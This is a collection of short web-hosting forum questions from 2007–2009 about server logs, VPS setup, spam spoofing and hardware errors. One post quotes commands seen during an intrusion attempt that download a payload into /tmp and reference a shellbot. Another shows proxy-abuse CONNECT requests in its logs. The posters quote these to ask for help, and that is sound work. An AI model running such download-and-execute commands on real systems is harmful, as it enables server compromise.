Private (local) IP Addresses Showing Up In My Logs
Mar 28, 2007
I just discovered this completely by accident on my new vps
visits (via apache) from 10.16.x.x and 10.28.x.x
These aren't backups but actual website visits.
What on earth is going on? Is my host browsing my website through their network?
Their behavior seems harmless but I just want to make sure this is not a security issue with a neighbor somehow doing something.
Jun 3, 2008
I've just taken a look at the raw apache logs on my cpanel machine here:-
/usr/local/cpanel/logs/access_log
And there are many hundreds of these:-
127.0.0.1 - - [06/03/2008:21:55:22 -0000] "GET / HTTP/1." 401 0 "" ""
127.0.0.1 - - [06/03/2008:21:55:22 -0000] "GET / HTTP/1." 401 0 "" ""
127.0.0.1 - - [06/03/2008:22:03:42 -0000] "GET / HTTP/1." 401 0 "" ""
127.0.0.1 - - [06/03/2008:22:03:42 -0000] "GET / HTTP/1." 401 0 "" ""
127.0.0.1 - - [06/03/2008:22:12:02 -0000] "GET / HTTP/1." 401 0 "" ""
127.0.0.1 - - [06/03/2008:22:12:02 -0000] "GET / HTTP/1." 401 0 "" ""
127.0.0.1 - - [06/03/2008:22:20:22 -0000] "GET / HTTP/1." 401 0 "" ""
127.0.0.1 - - [06/03/2008:22:20:22 -0000] "GET / HTTP/1." 401 0 "" ""
What is happening to my server to generate these log entries?
Jan 24, 2008
I have mod_security setup in WHM and am seeing a lot of these entries for various IP's.
Access denied with code 406 (phase 1). Match of "rx ^((?:(?:POS|GE)T|OPTIONS|HEAD))$" against "REQUEST_METHOD" required. [id "960032"] [msg "Method is not allowed by policy"] [severity "CRITICAL"]
Sep 18, 2007
How can I extract a list of visitor ip addresses from apache logs for a cpanel account?
Are there any tools that will do a whois lookup for all the IPs?
May 21, 2009
Some VPS providers are offering 2 and some are giving 4 private IP addresses.
Do we need private IP for setting up Name Servers? Is 2 private IPs enough for one reasonably big site with private name servers, email, etc.?
Jul 16, 2007
I'm trying to figure out a method to stop some of the email spam that we get, and I have something figured out, but I need help on implementing it.
Basically, we get a lot of spam emails from addresses claiming to be from our domain (EX: From: someguy@mysite.com). The email is actually not from our domain, nor does the address actually exist, but the From address is being forged to look like it is our domain.
Basically, to fix this, I want to block all email where the From address is claiming to be from our domain, with a nonexistent email address. I'm pretty sure that this is configurable in Exim, but I haven't found any tutorial on it, and I'm not familiar enough with Exim to do it very easily. Anyway, if anyone knows of a tutorial or how this could be accomplished, please let me know.
Just to Add:
The reason that these emails are a problem is that the spam software we are running recognizes these emails as being from our domain which it trusts, so they pass most spam filters.
Jul 25, 2007
Is it possible to delete these files in the server access_logs and errors_logs?
Sep 4, 2008
I am currently with the planet and am happy with them; however, as part of a new venture I need to gather a list of hosts as well as the planet that will be able to cater to the venture's needs and go to tender with the requirements.
ThePlanet offer something called a virtual rack. This is cheaper than renting a dedicated rack, allows for Gb networking but does not allow for a SAN. Do other providers offer something similar? The cost of putting a machine on the virtual rack is not that much more expensive than just renting the machine. I guess there isn't too much to these set-ups to be fair.
If not, then we are looking for dedicated racks, with the ability to host a SAN at some point, but starting off with say 3 servers (2 web servers, 1 storage server with raid5 6Tb of hdd). These servers will be dealing with network cameras although I don't think that many will be streaming at once but the network capacity does need to be there.
Whose door should I be knocking on to find out some prices?
One final thing, should I bother looking for co-lo providers as well? We are in the UK but not precious about our host being in the same country at all (it would be nice but UK prices are ££). Really, all we would be able to do with co-lo is buy the hardware outright to save price as we are not interested in looking after the hardware.
Nov 5, 2009
If you run into the fun error of Parallels VZA not showing your VPSs, you might try this:
Code:
#
# Compatibility fix for the vza from pim to vza
# Nicholas Rose nick.rose@nobistech.net
#
#updatedb
for i in `locate /ve.conf`; do
    # Read the container hostname from its config file
    vehost=`grep HOSTNAME "$i" | awk -F '"' '{print $2}'`
    # Strip any existing VE_TYPE entry, then append a single fresh one
    sed -i 's/VE_TYPE="regular"//g' "$i"
    echo 'VE_TYPE="regular"' >> "$i"
    echo "I just fixed $vehost"
done
Aug 12, 2007
I try to install a VPN server on my VPS ...
May 15, 2009
The vps has
256MB(512 burstable) of memory
10GB of HardDisk space
Using Lighttpd, PHP and MySQL
ControlPanel is LXAdmin
top - 05:59:24 up 36 min, 1 user, load average: 0.42, 0.60, 0.62
Tasks: 31 total, 1 running, 29 sleeping, 0 stopped, 1 zombie
Cpu(s): 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Mem: 1048576k total, 55216k used, 993360k free, 0k buffers
Swap: 0k total, 0k used, 0k free, 0k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1 root 15 0 1964 660 568 S 0 0.1 0:00.46 init
3922 root 15 0 7824 2104 1720 S 0 0.2 0:00.01 sshd
9868 root 15 0 2352 1272 1064 S 0 0.1 0:00.00 bash
11693 root 18 0 2104 1020 820 R 0 0.1 0:00.10 top
17861 root 16 0 1632 620 520 S 0 0.1 0:00.00 syslogd
17918 dbus 25 0 2636 468 328 S 0 0.0 0:00.00 dbus-daemon
17955 root 18 0 5116 956 644 S 0 0.1 0:00.00 sshd
18093 tinydns 18 0 1544 304 252 S 0 0.0 0:00.00 tinydns
18106 root 23 0 1596 372 308 S 0 0.0 0:00.00 tcpserver
18131 apache 18 0 8452 4276 812 S 0 0.4 0:02.27 lighttpd
18132 admin 15 0 38704 24m 6652 S 0 2.4 2:58.37 php-cgi
18224 addons 20 0 22024 8456 4572 S 0 0.8 0:00.01 php-cgi
18278 root 15 0 2348 1112 968 S 0 0.1 0:00.00 sh
19519 root 15 0 4032 1432 1172 S 0 0.1 0:00.00 lxadmin.exe
19557 root 17 0 2608 884 712 S 0 0.1 0:00.00 xinetd
19594 lxlabs 18 0 5364 2220 1160 S 0 0.2 0:00.13 lxadmin.httpd
19879 root 18 0 2344 1124 964 S 0 0.1 0:00.00 mysqld_safe
19921 mysql 15 0 13688 5240 3904 S 0 0.5 0:17.51 mysqld
20250 qmails 15 0 1804 476 372 S 0 0.0 0:00.00 qmail-send
20256 qmaill 18 0 1564 472 404 S 0 0.0 0:00.00 splogger
20260 root 22 0 1576 344 268 S 0 0.0 0:00.00 qmail-lspawn
20261 qmailr 15 0 1572 372 296 S 0 0.0 0:00.00 qmail-rspawn
20275 qmailq 18 0 1560 352 284 S 0 0.0 0:00.00 qmail-clean
21824 root 18 0 6200 1296 960 S 0 0.1 0:00.00 authdaemond
21828 root 15 0 1596 376 312 S 0 0.0 0:00.00 tcpserver
21834 root 25 0 1592 368 308 S 0 0.0 0:00.00 tcpserver
21838 root 18 0 6200 460 124 S 0 0.0 0:00.00 authdaemond
21842 root 18 0 1592 372 312 S 0 0.0 0:00.00 tcpserver
21861 root 25 0 1592 368 308 S 0 0.0 0:00.00 tcpserver
21890 root 18 0 3184 1108 576 S 0 0.1 0:00.00 crond
Jan 16, 2008
I just got an email from my vps saying that a BFD attack was stopped and the ip was banned after 40 failed attempts of logging into ftpdpro. I logged in and started looking around and I noticed that in my apf log file there was:
Code:
Jan 15 00:54:07 s1 apf(22290): {glob} firewall initalized
Jan 15 00:54:07 s1 apf(22290): {glob} fast load snapshot saved
Jan 15 00:58:06 s1 apf(32425): {glob} uptime less than 5 minutes, going full load
Jan 15 00:58:06 s1 apf(32425): {glob} activating firewall
Jan 15 00:58:06 s1 apf(32500): {glob} unable to load iptables module (ip_tables), aborting.
Jan 15 00:58:06 s1 apf(32425): {glob} firewall initalized
Jan 15 00:58:06 s1 apf(32425): {glob} fast load snapshot saved
Jan 15 01:00:04 s1 apf(3950): {glob} uptime less than 5 minutes, going full load
My concern is that it says "unable to load iptables module (ip_tables), aborting."
Dec 7, 2008
Is there anything that logs server load and what processes have caused any spikes?
One of my servers keeps going down under high load. Well, it seems to lock up and the NOC has to reboot, but of course the techs can't diagnose a problem after, as it runs fine, and when I send them a ticket it's because the server can't be reached at all and then they can't diagnose it either.
Jul 18, 2009
I've just done the following on Ubuntu Server 9.03:
Code:
sudo apt-get install mysql-server
sudo apt-get install apache2
sudo apt-get install php5
sudo apt-get install php5-mysql
sudo apt-get install phpmyadmin
But when I say [url]-- it cannot be found..
I tried [url] as well; it cannot be found either.
Jun 21, 2008
I recently installed CentOS 5.1 with some new hardware.
After installation, when I type free in SSH the total amount of RAM shows as: 3359580
I have two brand new Corsair 2GB modules installed.
Is this normal?
Apr 15, 2007
How would I set up Bandmin to show the extra 5 IP's that I just added ?
It shows stats for the main shared IP, but isn't for the 5 new ones that I added via WHM.
Help plz.....
(these IP's are not assigned to any domains, as they are just used for downloads)
Dec 31, 2007
Whenever I try to connect to FTP through any of my server accounts, it does not show any directory inside public_html, but when I use the cPanel file manager it works fine. I also tried a different FTP client program but the problem is still not solved. Will any of you help me? FTP connects successfully but does not show files and folders.
Oct 4, 2007
I have a VPS and am looking for a way to show existing and potential clients the uptime levels of the server. I have a basic uptime page provided by WHMCS, but I want to go a little beyond that.
If I were to choose an uptime reporting service such as siteuptime.com, hyperspin.com or site24x7.com, what would you recommend that I monitor? Obviously HTTP, FTP, POP3 and MySQL, but anything else? Do these services monitor the server load also?
Also, is it a good idea to display these stats publicly?
Apr 16, 2009
I moved a domain of mine from one of my CentOS servers on my SoHo LAN, to one of my CentOS cPanel/WHM servers. Since the SoHo machine had been handling this domain's mail for almost 2 years (300+ mb of mail), I decided to continue running it from home.
The Apache daemon was stopped on said SoHo box following DNS propagation to the cPanel machine, but Apache was automatically started again after having to reboot the SoHo server. Before I got a chance to kill Apache, I got some weird entries showin' up in the access_logs.
www.####.com ip54520165.adsl-surfen.hetnet.nl - - [15/Apr/2009:23:30:20 -0700] "CONNECT 205.188.179.233:443 HTTP/1.0" 302 286 "-" "-"
www.####.com ip54520165.adsl-surfen.hetnet.nl - - [15/Apr/2009:23:37:05 -0700] "CONNECT 205.188.176.230:443 HTTP/1.0" 302 286 "-" "-"
www.####.com ip54520165.adsl-surfen.hetnet.nl - - [15/Apr/2009:23:43:30 -0700] "CONNECT 205.188.153.99:443 HTTP/1.0" 302 285 "-" "-"
www.####.com ip54520165.adsl-surfen.hetnet.nl - - [16/Apr/2009:00:10:01 -0700] "CONNECT 205.188.153.100:443 HTTP/1.0" 302 286 "-" "-"
I ask simply because I don't recall seeing a "CONNECT" entry in my logs before, and I've been at this for awhile. That or I've just not paid any attention. And what's with the SSL port?
I guess I'm just a little confused as to what was trying to be accomplished here...it hasn't returned since.
Jul 7, 2008
Can we delete SQL logs? They occupy 2.97gb.
All the log is under a single file, occupying a huge amount of space on our server.
We use lxadmin for the VPS.
We are unable to even open the file, as we have almost run out of space. We would at least like to delete logs older than a month; these logs are from 3 months, so please help us in solving this problem.
If we delete the SQL log, will a new log be created automatically or will it give an error?
Jun 5, 2008
if redhat keeps a log of ip addresses which have logged into the server.
I've got a machine that one of my staff logged into today with the root account, and I'm wondering if I can find out the IP address of the user who logged in as root?
Apr 9, 2008
How can I check the logs to see if there are any errors? Can I check this via WHM?
Mar 25, 2008
I think my apache is killing my servers with crazy overload with logs... how do I turn this off?
Mar 30, 2008
I have recently started a forum and am wondering where I should locate the error logs for such things as database backups and failed admin panel login attempts.
There is the public_html folder, but I'm concerned that anything contained within this folder is accessible to prying eyes. Is this true?
I have also heard of directory traversal, which I imagine could fall under the same category.
Would I perhaps be best off creating a folder outside of public_html for the holding of these valuable 'targets'?
What would I best do to secure my server in this regard? It would have to be writeable for the system to be operational.
Aug 30, 2007
How do we view boot-up logs to see what errors you're getting?
Feb 22, 2007
Why is this happening?
Feb 22 04:58:31 la1092 kernel: ata2: command 0xc8 timeout, stat 0x50 host_stat 0x24
Feb 22 04:58:32 la1092 kernel: ata2: status=0x50 { DriveReady SeekComplete }
Feb 22 04:58:32 la1092 kernel: Info fld=0x2d7e, Current sdb: sense key No Sense
Feb 22 04:58:32 la1092 kernel: ata1: command 0xc8 timeout, stat 0x50 host_stat 0x24
Feb 22 04:58:32 la1092 kernel: ata1: status=0x50 { DriveReady SeekComplete }
Feb 22 04:58:32 la1092 kernel: Info fld=0x4632f99, Current sda: sense key No Sense
Feb 22 04:58:32 la1092 kernel: ata2: command 0xc8 timeout, stat 0x50 host_stat 0x24
Current setup is nginx, lighttpd and apache as web servers.
Jul 26, 2007
I keep receiving hacking attempts from someone accessing my server and running commands like these:
Code:
hubberfix
sh -c cd /tmp;lwp-download [url]
shellbot
I cannot find any logs with these attempts. Or at least any with info like an IP address or host doing this.
Not to sound like a noob, but where can I find logs that would tell me all the commands run on my system? FYI, I'm running Debian Sarge, and I looked in "/var/log" and I can't find much of anything.
Mar 19, 2007
Where are MySQL logs stored on apache?